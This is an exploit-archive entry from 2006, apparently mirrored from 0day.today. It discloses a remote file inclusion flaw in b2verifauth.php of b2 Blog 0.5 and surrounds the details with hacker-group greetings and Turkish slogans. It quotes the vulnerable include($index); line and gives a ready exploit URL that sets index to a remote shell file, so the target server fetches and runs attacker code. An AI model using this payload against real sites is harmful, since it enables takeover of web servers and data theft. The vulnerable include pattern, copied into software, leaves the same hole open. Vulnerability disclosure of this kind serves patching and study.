id: 1292
date: 12/23/2006
title: b2 Blog <= 0.5 (b2verifauth.php) Remote File Include Vulnerability
author: mdx
cves: 

==================================================================
b2 Blog <= 0.5 (b2verifauth.php) Remote File Include Vulnerability
==================================================================



******************************************************************************************************
*b2 - 0.5 * [index] ******************* Remote File ?nclude*******************************************
******************************************************************************************************
******************************************* +class : Remote File Include Vulnerability*
+******************************************************************************************************************
+Author : mdx                                                               
*
*****************************************************************************
+Files :                                                                    *
+b2verifauth.php? 							    *
*                                                                           *
**********************************************************************************
+code  :								         *
+									         *
+         include($index);							 *
+									         *
*********************************************************************************************
+ Exploit  :										    *
+********************************************************************************************+
+ http://www.site.***/[path]/b2verifauth.php?index=http://mdxshell.txt?  		     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=================================================================================================================
?		   Hi , The_bat_hacker , How are you ? ;=) 				     			*
?											     			*
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , Ozii ,padisah, sakkure ,zip,y.$il abbad, dreamlord  *
?											     			*
?////////////////////////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************									     *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..  		     *
*******************									     *
*******************                        Turkish Hacker by mdx  			     *
******************* 		   							     *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************              							     *
**********************************************************************************************



#  0day.today [2023-03-26]  #